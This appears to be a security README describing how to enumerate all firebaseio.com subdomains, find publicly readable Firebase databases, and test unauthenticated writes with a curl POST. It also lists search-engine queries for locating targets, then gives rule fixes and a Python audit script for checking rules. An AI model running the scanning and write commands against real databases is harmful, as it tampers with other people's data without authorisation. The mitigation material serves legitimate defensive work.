This repository provides a workflow to find subdomains of firebaseio.com, test them for public accessibility, and exploit a .json endpoint to check for write vulnerabilities. Additionally, mitigation steps are provided to fix the issue.
Use subfinder to enumerate subdomains for firebaseio.com:
```bash
subfinder -d firebaseio.com -o subdomains.txt
```

Once subdomains are collected, use httpx to check .json endpoints for accessible responses (HTTP status code 200):

```bash
httpx -l subdomains.txt -path "/.json" -mc 200 -o valid_subdomains.txt
```

Alternatively, run firebaseExploiter against the collected list:

```bash
firebaseExploiter -file subdomains.txt
```

Use curl to send a POST request to the .json endpoint to test if data can be written without authentication:

```bash
curl -X POST https://<subdomain>.firebaseio.com/.json -d '{"test":"poc"}' -H "Content-Type: application/json"
```

If successful, the server is vulnerable to unauthenticated write access.
To secure the Firebase database:

- Set Firebase Database Rules:
  - Open the Firebase Console.
  - Go to Database > Rules.
  - Update the rules to restrict access only to authenticated users. Example:

    ```json
    {
      "rules": {
        ".read": "auth != null",
        ".write": "auth != null"
      }
    }
    ```

- Audit Subdomains:
  - Ensure there are no unused or publicly misconfigured Firebase databases.

- Monitor Activity Logs:
  - Use Firebase to monitor access logs for suspicious activities.
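As an added example (not part of this repository), a small audit that parses a Realtime Database rules document and reports every `.read` or `.write` rule set to a literal `true`, which is what leaves a database publicly accessible. The sample rule sets are constructed for the example; the restricted one mirrors the rules recommended above.

```python
import json
from typing import Dict, List, Tuple

# Constructed samples: an open rule set of the kind that produces the
# exposures tested above, and the restricted rule set recommended above.
OPEN_RULES = '{"rules": {".read": true, ".write": true}}'
RESTRICTED_RULES = '{"rules": {".read": "auth != null", ".write": "auth != null"}}'

# A rule expression that is literally true (bool or the string "true")
# grants access to everyone, authenticated or not.
PERMISSIVE = {True, "true"}

Finding = Tuple[str, str, str]  # (path, rule key, reason)


def _walk(node: Dict, path: str, findings: List[Finding]) -> None:
    """Recursively collect .read/.write rules that grant unconditional access."""
    for key, value in node.items():
        if key in (".read", ".write"):
            if value in PERMISSIVE:
                findings.append((path or "/", key, "public"))
        elif key == ".validate":
            continue  # .validate constrains data shape; it never grants access
        elif isinstance(value, dict):
            _walk(value, f"{path}/{key}", findings)


def audit_rules(rules_json: str) -> List[Finding]:
    """Return one finding per overly permissive rule in a rules document.

    Rules are inherited downward, so a public rule near the root exposes
    every child path beneath it. A missing rule denies access, so only
    explicit true values are reported.
    """
    doc = json.loads(rules_json)
    findings: List[Finding] = []
    _walk(doc.get("rules", {}), "", findings)
    return findings


if __name__ == "__main__":
    for name, rules in (("open", OPEN_RULES), ("restricted", RESTRICTED_RULES)):
        print(name, audit_rules(rules) or "no public rules")
```

Note that `auth != null` only requires some signed-in user, so enabling anonymous sign-in would reopen the database; scope rules per path (for example `auth.uid == $uid`) where the data model allows it.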
- FOFA query: `domain="firebaseio.com"`
- Shodan query: `http.title:"Firebase"`
- ZoomEye query: `site:"firebaseio.com"`
Here are real-world examples of Firebaseio vulnerabilities reported on HackerOne:
This script is intended for educational purposes and for security testing of systems you own or have explicit permission to test. Do not use this for unauthorized activities.
If you find this work helpful, you can support me:
Thanks for your support! ❤️
